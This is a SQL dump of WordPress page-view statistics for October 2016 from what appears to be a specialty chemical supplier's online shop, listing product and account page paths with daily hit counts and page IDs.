INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-23', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-23', 2, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-specialty-solvent/', '2016-10-23', 1, 2618); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-23', 1, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-23', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-23', 2, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-lubricant/', '2016-10-23', 1, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/', '2016-10-23', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/', '2016-10-23', 1, 467); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milsolv-medical-solvents/', '2016-10-23', 1, 473); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/millube-perfluorinated-synthetic-lubricants/', '2016-10-23', 1, 468); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-23', 2, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-23', 2, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-23', 1, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/cobra-duster/', '2016-10-23', 1, 1851); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rust-inhibitor/', '2016-10-23', 1, 1724); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/penetrating-oil/', '2016-10-23', 1, 1729); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze/', '2016-10-23', 1, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conductive-coating/', '2016-10-23', 1, 1722); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/spray-trigger/', '2016-10-23', 1, 1852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/', '2016-10-23', 2, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-67-radical-initiator/', '2016-10-23', 1, 575); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88-radical-initiator/', '2016-10-23', 1, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240az/', '2016-10-23', 1, 638); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ab/', '2016-10-23', 1, 643); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-23', 1, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/', '2016-10-23', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-214/', '2016-10-23', 1, 821); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-224/', '2016-10-23', 1, 847); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a4/', '2016-10-23', 1, 1014); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-215/', '2016-10-23', 1, 822); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-225/', '2016-10-23', 1, 848); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xp-2a5/', '2016-10-23', 1, 1012); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-202/', '2016-10-23', 1, 783); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-203/', '2016-10-23', 1, 784); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/', '2016-10-23', 1, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-223/', '2016-10-23', 1, 844); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-23', 1, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-sx/', '2016-10-23', 1, 671); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-ac/', '2016-10-23', 1, 672); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-acx/', '2016-10-23', 1, 674); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-23', 1, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xht-500/', '2016-10-23', 1, 707); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a5/', '2016-10-23', 1, 998); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1506/', '2016-10-23', 1, 943); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/', '2016-10-23', 2, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1525/', '2016-10-23', 1, 954); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2245/', '2016-10-23', 1, 714); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/', '2016-10-23', 1, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2045/', '2016-10-23', 1, 713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2e45/', '2016-10-23', 1, 717); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2a45/', '2016-10-23', 1, 715); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-agl-683/', '2016-10-23', 1, 1072); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-23', 2, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-23', 8, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-101/', '2016-10-23', 2, 436); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-101/?wc-ajax=get_refreshed_fragments', '2016-10-23', 2, 436); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/', '2016-10-23', 1, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-10-23', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing', '2016-10-23', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing/', '2016-10-23', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-23', 1, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vydax-nrt-960/', '2016-10-23', 2, 1683); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vydax-nrt-960/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 1683); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/', '2016-10-23', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-23', 1, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-10-23', 3, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-23', 2, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-23', 3, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-23', 4, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/', '2016-10-23', 1, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-white-lithium-grease/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 1106); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/', '2016-10-23', 1, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3253/', '2016-10-23', 1, 1865); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/universal-ptfe-release-agent/', '2016-10-23', 3, 305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/universal-ptfe-release-agent', '2016-10-23', 1, 305); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds', '2016-10-23', 1, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-23', 1, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-48/heloxy-48/', '2016-10-23', 1, 1222); 
INSERT INTO `wp_statistics_pages` VALUES ('///?gf_page=upload', '2016-10-23', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-560562/', '2016-10-23', 1, 1695); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-560562/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 1695); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rubber-molding-release-agents/', '2016-10-23', 1, 419); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents-2/', '2016-10-23', 1, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/composite-mold-release-agent/', '2016-10-23', 1, 290); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/', '2016-10-23', 1, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/', '2016-10-23', 1, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-23', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-eg-2000/', '2016-10-23', 1, 967); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-eg-2000/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 967); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/wishlist/view/', '2016-10-23', 1, 5); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-23', 3, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroguard-pca/', '2016-10-23', 1, 1428); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoroguard-pca/?wc-ajax=get_refreshed_fragments', '2016-10-23', 1, 1428); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-24', 398, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/the/', '2016-10-24', 1, 1097); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/the/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 1097); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-24', 5, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-24', 4, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-24', 5, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-24', 4, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-24', 2, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-24', 21, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-24', 9, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-24', 52, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-24', 28, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-24', 18, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-24', 8, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-24', 1, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-24', 28, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-24', 28, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/', '2016-10-24', 3, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-product-selection-guide/', '2016-10-24', 2, 2317); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-24', 13, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-24', 5, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/universal-ptfe-release-agent/', '2016-10-24', 1, 305); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-24', 1, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-lvp/', '2016-10-24', 2, 862); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-24', 125, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/', '2016-10-24', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/steam-control-valve-lubricant/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 2322); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/surface-prepclean-ms-255257/', '2016-10-24', 19, 1712); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/', '2016-10-24', 1, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-plss/', '2016-10-24', 1, 888); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vydax-nrt-960/', '2016-10-24', 2, 1683); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-738/', '2016-10-24', 2, 1840); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-24', 9, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/', '2016-10-24', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/', '2016-10-24', 10, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-24', 6, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-862/', '2016-10-24', 1, 887); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-24', 7, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-24', 6, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/?wc-ajax=get_refreshed_fragments', '2016-10-24', 2, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-24', 17, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-24', 11, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/', '2016-10-24', 1, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-224/', '2016-10-24', 1, 847); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-24', 5, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/', '2016-10-24', 6, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-105/?wc-ajax=get_refreshed_fragments', '2016-10-24', 4, 440); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-227/', '2016-10-24', 1, 852); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/', '2016-10-24', 3, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3253/', '2016-10-24', 1, 1865); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/mil-spec-urethane-conformal-coating/', '2016-10-24', 2, 190); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/mil-spec-urethane-conformal-coating/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 190); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/', '2016-10-24', 2, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1514/?wc-ajax=get_refreshed_fragments', '2016-10-24', 3, 944); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-101/', '2016-10-24', 2, 436); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-101/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 436); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381h/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 1670); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ks-1220/', '2016-10-24', 7, 2460); 
INSERT INTO `wp_statistics_pages` VALUES ('/hexion-epikure-3140-curing-agent/', '2016-10-24', 2, 1462); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/', '2016-10-24', 2, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-100/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 421); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-24', 5, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/?wc-ajax=get_refreshed_fragments', '2016-10-24', 5, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3234/3223-3234-3245/', '2016-10-24', 1, 1186); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3223/', '2016-10-24', 1, 1183); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-24', 2, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3234/', '2016-10-24', 1, 1185); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-24', 6, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-24', 8, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/', '2016-10-24', 4, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/%20', '2016-10-24', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-account/', '2016-10-24', 4, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/', '2016-10-24', 1, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/%20', '2016-10-24', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/customer-logout/', '2016-10-24', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/', '2016-10-24', 2, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/?p=2694&preview=true', '2016-10-24', 4, 2694); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-555557/', '2016-10-24', 6, 1384); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/%20', '2016-10-24', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing', '2016-10-24', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/edit-address/billing/', '2016-10-24', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-24', 1, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents-2/', '2016-10-24', 4, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/troubleshooting-common-molding-issues/', '2016-10-24', 17, 2694); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-24', 2, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-24', 2, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/?wc-ajax=get_refreshed_fragments', '2016-10-24', 2, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/', '2016-10-24', 3, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3140/', '2016-10-24', 1, 1868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3140/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 1868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/', '2016-10-24', 2, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ks-1220/?wc-ajax=get_refreshed_fragments', '2016-10-24', 3, 2460); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/composite-mold-release-agent/', '2016-10-24', 2, 290); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/mold-release-agent/', '2016-10-24', 2, 423); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rubber-molding-release-agent/', '2016-10-24', 2, 293); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/rubber-molding-release-agents/', '2016-10-24', 2, 419); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agent/', '2016-10-24', 2, 400); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/ks1220/', '2016-10-24', 1, 356); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/ks1220/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 356); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agents/', '2016-10-24', 1, 297); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/', '2016-10-24', 5, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-24', 2, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tm7/', '2016-10-24', 1, 1077); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/tm7/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 1077); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-bearing-lubrication/', '2016-10-24', 1, 2503); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-24', 2, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/?wc-ajax=get_refreshed_fragments', '2016-10-24', 5, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-752u/', '2016-10-24', 1, 1834); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-electronic-coating/', '2016-10-24', 1, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-electronic-coating/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-x-si/', '2016-10-24', 1, 2344); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/', '2016-10-24', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-204/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 788); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/', '2016-10-24', 2, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ac/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 644); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122adl/', '2016-10-24', 1, 1679); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-252n/', '2016-10-24', 1, 622); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-10-24', 3, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-24', 3, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/embed/', '2016-10-24', 3, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/', '2016-10-24', 2, 427); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-24', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-88-radical-initiator/', '2016-10-24', 1, 577); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-24', 3, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/', '2016-10-24', 6, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-24', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-24', 1, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-24', 1, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze/', '2016-10-24', 2, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-24', 2, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/heloxy-71/', '2016-10-24', 1, 1230); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-24', 3, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/', '2016-10-24', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/hexion-epikure-3140-curing-agent/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 1462); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240aa/', '2016-10-24', 1, 642); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/1102/', '2016-10-24', 1, 1102); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/contact-re-nu/', '2016-10-24', 2, 1292); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/', '2016-10-24', 2, 467); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/?wc-ajax=get_refreshed_fragments', '2016-10-24', 2, 467); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-207/', '2016-10-24', 1, 814); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-207/?wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 814); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-lubricant/', '2016-10-24', 1, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/?add_to_wishlist=467', '2016-10-24', 1, 467); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/?add_to_wishlist=467&wc-ajax=get_refreshed_fragments', '2016-10-24', 1, 467); 
